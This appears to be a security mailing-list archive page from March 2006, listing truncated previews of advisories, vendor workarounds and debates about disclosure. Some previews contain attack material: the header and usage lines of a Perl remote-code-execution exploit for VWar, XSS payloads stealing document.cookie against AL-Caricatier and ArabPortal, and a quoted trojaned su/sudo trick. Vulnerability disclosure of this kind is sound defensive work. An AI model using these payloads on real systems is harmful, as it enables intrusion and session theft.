EEYE: Temporary workaround for IE createTextRange vulnerability

2006-03-28 Thread Marc Maiffret
eEye Digital Security has created a temporary work around for the current Internet Explorer zero day vulnerability within the IE createTextRange functionality. This workaround has been created because currently there is no solution from Microsoft other than the workaround to disable Active Script

VWar <= 1.5.0 R11 Remote Code Execution Exploit

2006-03-28 Thread uid0
#!/usr/bin/perl ## # VWar <= 1.5.0 R11 Remote Code Execution Exploit # Bug Found By [Oo] code by uid0/zod ## # (c) 2006 # ExploiterCode.com ## # usage: # perl vwar.pl # # perl vwar.pl http://site.com/vwar/ http://site.com/cmd.txt cmd # # cmd shell example: # # cmd shell variable: ($_GET[cmd]);

Re: On classifying attacks

2006-03-28 Thread Gadi Evron
Daniel Weber wrote: Crispin Cowan wrote: I participated in that Lincoln Labs study, and my recollection is that the remote/local distinction was already popular on bugtraq at the time. I've seen a lot of classification schemes proposed on Bugtraq in the intervening years, some of them quite g

[eVuln] Maian Events SQL Injection Vulnerability

2006-03-28 Thread alex
New eVuln Advisory: Maian Events SQL Injection Vulnerability http://evuln.com/vulns/102/summary.html Summary eVuln ID: EV0102 CVE: CVE-2006-1341 Software: Maian Events Software's Web Site: http://www.maianscriptworld.co.uk/ Versions: 1.0 Critical Level: Moderate

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)

2006-03-28 Thread Geo.
> No, he said: "I am up to the challenge and I will do my best." If he couldn't he would have been responsible enough to say "I can't." If he stayed anyway and would have not been up to task (which he was), he would have been seriously attacked as well and maybe even it would have been t

XSS in AL-Caricatier

2006-03-28 Thread xx_hack_xx_2004
Hello Vulnerable: AL-Caricatier,V.2.5 http://www.php-ar.com Exploit : http://example.com/AL-Caricatier/view_caricatier.php?CatName='>alert(document.cookie); http://example.com/AL-Caricatier/view_caricatier.php?CaricatierID='>alert(document.cookie); http://example.com/AL-Caricatier/view_caricatie

[eVuln] Maian Support Authentication Bypass

2006-03-28 Thread alex
New eVuln Advisory: Maian Support Authentication Bypass http://evuln.com/vulns/103/summary.html Summary eVuln ID: EV0103 CVE: CVE-2006-1259 Software: Maian Support Software's Web Site: http://www.maianscriptworld.co.uk/ Versions: 1.0 Critical Level: Moderate Typ

[SECURITY] [DSA 1021-1] New netpbm-free packages fix arbitrary command execution

2006-03-28 Thread Moritz Muehlenhoff
Debian Security Advisory DSA 1021-1 http://www.debian.org/security/ Moritz Muehlenhoff March 28th, 2006

Genius VideoCAM NB Local Privilege Escalation

2006-03-28 Thread beford
Software Vulnerable Genius VideoCAM NB Driver http://download.geniusnet.com.tw/CAMERA/webnb.zip Other genius webcams with the same 'snapshot feature' might be affected with the same issue, if you have any of those please try to reproduce this issue. Affects: Windows XP / Windows 2000 Proof of

Secunia Research: Blazix Web Server JSP Source Code Disclosure Vulnerability

2006-03-28 Thread Secunia Research
== Secunia Research 28/03/2006 - Blazix Web Server JSP Source Code Disclosure Vulnerability - == Table of Contents Affected Software.

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)

2006-03-28 Thread Casper . Dik
> * Theo de Raadt:
>> What if we ignore your procedures? What if we say no?
> You won't be told about bugs in the code you write. It's as simple as that. But I don't quite understand why Gadi is so thoroughly offended by the way how this vulnerability has been handled so far. The patches

Re: SYM06-006, Veritas NetBackup: Multiple Overflow Vulnerabilities in NetBackup Daemons

2006-03-28 Thread secure
The correct URL for the full advisory should be http://securityresponse.symantec.com/avcenter/security/Content/2006.03.27.html

Re: Microsoft Windows XP SP2 Firewall issue

2006-03-28 Thread Thor (Hammer of God)
If you're going to get someone to run the mytrojan.exe file, why not just have it add itself to the exception list for you? I've said it a million times, and here is a million-and-one: When a statement starts off with "If I get someone to run X on their system, I can," then it doesn't matter

Announcement: The Web Hacking Incidents Database

2006-03-28 Thread contact
"The web hacking incident database (WHID) is a Web Application Security Consortium project dedicated to maintaining a list of web applications related security incidents. The goal is to serve as a tool for raising awareness of the web application security problem and provide the information for

ArabPortal 2.0 Stable CrossSiteScripting

2006-03-28 Thread o . y . 6
ArabPortal 2.0 Stable .. The Best Arabian Portal & Forums System * The Bug Is XSS * [code] online.php?&title=D3vil-0x1CODE download.php?action=byuser&userid=1&title=D3vil-0x1CODE [/code] [center] ^^ Secumod 0.1 Anti-XSS & SQL Injection ^^ [ Get It For Free !! Only 15$ And Update it forever ] [ C

Re: Sudo tricks

2006-03-28 Thread Thomas M. Payerle
On Fri, 24 Mar 2006, Dave Korn wrote: John Richard Moser wrote: Here is a simple hack to break sudo and su to get free root. Add this to ~/.bashrc and fill in the following blanks: * ~/.root_kit/rk_su Your hacked su to give root on su --now-dammit * ~/.root_kit/silent_install_root_kit Your

Re: [SECURITY] [DSA 1020-1] New flex packages fix insecure code generation

2006-03-28 Thread Matthew R. Dempsky
On Tue, Mar 28, 2006 at 01:19:34AM +0200, Moritz Muehlenhoff wrote: > If you use code, which is derived from a vulnerable lex grammar in an untrusted environment you need to regenerate your scanner with the fixed version of flex. Do any Debian packages include such a vulnerable grammar? (If s

Determina Fix for CVE-2006-1359 (Zero Day MS Internet Explorer Remote "CreateTextRange()" Code Execution)

2006-03-28 Thread Determina Secure
March 27, 2006 Determina Fix for CVE-2006-1359 (Zero Day MS Internet Explorer Remote "CreateTextRange()" Code Execution) Overview & Instructions On Downloading The Free Determina Shield For CVE-2006-1359 Based on the same technology used in the VPS LiveShield product, Determina has engineer

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)

2006-03-28 Thread Gadi Evron
Eric Allman wrote: I know the guy who exploited it. He's better than you think he is. I'm sorry, I was not trying to imply in any way that Mark was blowing smoke. I believe he can do it. Take my statement literally: /we/ don't /see/ how it can be practical. Perhaps I should have said "un

Cantv/Movilnet's Web SMS vulnerability.

2006-03-28 Thread Bugtraq @ SNSecurity
Quick Summary: Product : Movilnet's Web SMS. Version : In-production versions. Vendor : Movilnet - http://www.movilnet.com.ve/ Class : Remote Criticality : High Operating System(s) : N/A. Synopsis *

Re: PHP-Stats <= 0.1.9.1 remote commands execution

2006-03-28 Thread nomail
All bugs were fixed in 0.1.9.1b http://www.phpstats.net

Re: Sudo tricks

2006-03-28 Thread Steven M. Christey
> So, in other words, all you need in order to get root access is a rootkit, your shell script, and root access? Ummm... I don't get it. I was also confused by this. However, one guess is that by compromising an unprivileged account and creating command aliases to run trojaned su and sudo progra

Re: [Full-disclosure] Critical PHP bug - act ASAP if you are running web with sensitive data

2006-03-28 Thread Stefan Esser
Hello, just to stop this: The bug is a binary safety issue in html_entity_decode. A function that is not usually used on user input, because user input is usually not expected in HTML format and then decoded. Even if the function is used on user input it can only leak memory to a potential attack

Critical PHP bug - act ASAP if you are running web with sensitive data

2006-03-28 Thread Tõnu Samuel
Hi everybody! I want to tell that a pretty nasty bug was discovered in PHP (all tested versions were vulnerable). I do not want to disclose many details as it may hurt many websites. I expect the PHP team to make a patch first. There is a simple way to protect yourself against this bug if you put some co

Re: Secunia Research: Microsoft Internet Explorer "createTextRange()"Code Execution

2006-03-28 Thread edubp2002
Internet Explorer 6 on XP SP2 Portuguese seems not vulnerable to code execution, that's what I conclude after several tests on 4 machines. The vulnerability exists, but it causes IE to crash after some time and Windows alerts about low virtual memory. Sometimes while IE was frozen and Windows